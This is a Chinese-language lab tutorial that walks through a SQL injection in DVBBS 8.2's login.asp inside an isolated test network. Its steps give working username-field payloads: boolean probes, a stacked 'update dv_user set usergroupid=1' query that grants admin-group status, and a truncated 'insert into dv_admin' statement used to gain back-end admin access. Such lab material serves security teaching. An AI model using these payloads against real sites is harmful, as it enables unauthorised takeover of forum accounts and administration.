一、实验目的
理解动网论坛8.2原理
二、实验原理
动网论坛用户登录过程中,过滤不严,导致注入,提升权限。漏洞存在源文件的login.asp中。
三、实验环境
本机:192.168.1.2
目标机:192.168.1.3
四、 实验步骤
一、正常注册登录
1、访问地址:http://192.168.1.3:8010/,如图示:
2、首先注册一个用户:san 密码:123456,如图:
二、漏洞测试与利用
1、退出san ,打开登录界面:
2、使用以下语句登录:san’ and ‘a’=’ a 密码:123456
3、使用以下语句再次登录:san’ and ‘a’=’ b 密码:123456
4、提示用户不存在,说明以上语句起作用了,用户名处输入:
,;update dv_user set usergroupid=1 where username='san'--
5、提示用户名不存在,我们再次使用正确用户名和密码san 123456登录。在控制面板-我能做什么中,点击后,显示已是管理员组用户。
6、san用户为管理员身份,退出,我们再次使用以下语句登录,密码为正确密码(此处步骤重要):
san’;insert into dv_admin
7、打开管理员界面http://192.168.1.3:8010/admin
使用用户名:admin 密码:123456成功登陆
8、登陆后发现已是管理员身份,如图: